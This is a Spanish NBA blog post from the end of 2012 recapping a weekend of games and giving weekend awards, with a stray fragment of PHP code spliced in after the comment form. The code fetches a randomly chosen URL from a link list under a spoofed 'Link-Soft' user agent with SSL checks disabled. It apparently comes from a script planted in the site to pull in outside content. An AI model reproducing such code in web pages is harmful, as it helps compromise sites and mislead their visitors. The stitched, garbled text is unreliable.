Informe último fin de semana 2012

31 de December de 2012 por TheDeerHunter

Último fin de semana del 2012. Repasamos lo que ha dado de sí.

El regalo de Navidad nos lo dejó Esteban el otro día, con su propia crónica de lo que sucedió la noche del viernes. Algunos apuntes que aprovechamos hoy. Perdonad el copy-paste:

“Los Wizards vuelven a la victoria (…) con Nene de titular y Okafor (…) nota relevante tambien es el aparecer de Crawford como sexto hombre”  “Magic sin Davis tienen poco que ofrecer”.

“Los Pacers vencen (…) George se fue a los 15 puntos, Hibbert a los 14 rebotes y Hill a los 22.”

(Brook) Lopez abusó de sus rivales (Bobcats), 26 puntos 11 rebotes y 3 tapones”

“Derrota de Miami frente a los todopoderosos Pistons”.

“Atlanta sale victorioso de cleveland en un juego muy parejo”

“Toronto derrotó a los Pelícanos, a pesar del nivel all-star de Davis (…) 25 puntos con 11-20, 9 rebotes y 3 bloqueos”

“Dallas se olvida de su genial arranque y empieza a perder puestos de manera significativa”

“Lin y Harden se combinan para hacer nada menos que 54 puntos, 15 asistencias y 6 robos de balon, pero enfrente había 3 leyendas vivientes”

“Knicks caen en Sacramento con la mitad del equipo”

“Lakers venció a Portland, para los que nos tiene acostumbrados, la banca se salió”

“los Clippers sufrieron el partido (ante Jazz) (…) CP3, con una jugada tras otra, recortó distancias en el tercer cuarto y pasó al frente en el último, anotando los últimos puntos para ganar el juego”

“DAVID LEE está jugando no solo a nivel all-star, sino para entrar en la conversación para el MVP y mejor quinteto”

El sábado Brook López, a las órdenes de Carlesimo también destrozó a los Cavs; David Lee puso su granito de arena para doblegar a los Celtics; los Heat con Wade perdieron también contra Bucks; Bobcats se llevó su 18ª derrota seguida ante Hornets; los Raptors destrozaron a Orlando; Portland volvió a la victoria sobre 76ers; los Wolves sin Ricky doblegaron a Suns; los Thunder pusieron a Rockets en su sitio; los Bulls impusieron su defensa ante Wizards y en dos duelos directos importantes Hawks se impusieron a Pacers y Grizzlies hicieron lo propio con Nuggets.

Finalmente anoche Cousins firmó un triple doble y Isaiah Thomas ejecutó a Rondo y los Celtics; los Clippers sufrieron menos que el viernes ante Utah; los Spurs le endosaron la 6ª derrota seguida a Dallas y los Pistons pararon a Bucks en una actuación para olvidar de Jennings.

PREMIOS

MVP: El irregular rendimiento de los Nets va directamente ligado a la presencia de Brook Lopez. Así como le mencionamos como uno de los hombres más importantes del mes de noviembre, su lesión fue la principal causa de la mala racha de su equipo este mes que ha terminado con la destitución de Avery Johnson. Este fin de semana, dos extraordinarios partidos y dos victorias. En ambos casos dobles figuras en rebotes que, en su caso, es más destacable todavía.

El rookie: No ha sido un fin de semana redondo para ningún rookie. Los mejores han combinado extraordinarias actuaciones como la de Davis el viernes o Kidd-Gildchrist y Lillard el sábado, con otras más flojas. Si acaso podemos destacar la regularidad de Drummond con dos actuaciones simplemente sólidas, pero en dos victorias para los suyos.

La sorpresa: Se concentra de nuevo en las dos victorias de Detroit, una de ellas contra Miami. En ellas Villanueva ha jugado bien, pero es que ante los campeones destapó el tarro de las esencias y recordó al jugador que se ganó el contrario millonario que disfruta. Un auténtico martillo pilón ofensivo, arma letal desde la larga distancia.

La decepción: Por su parte, los Mavericks están en caída libre y lo van a tener muy difícil para alcanzar la postemporada. Muy preocupante la racha de juego de algunos. En este caso nos quedamos con el estado de Shawn Marion y las serias dificultades que atraviesa para encontrar aro.

El mayor esfuerzo en vano: No es frecuente encontrarlo en esta categoría y menos aún en un ciclo de partidos como los del fin de semana. LeBron James es un monstruo baloncestístico gane o, como ha ocurrido en estos dos últimos partidos, pierda.

Acabamos con el Top 10 de la pasada madrugada:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>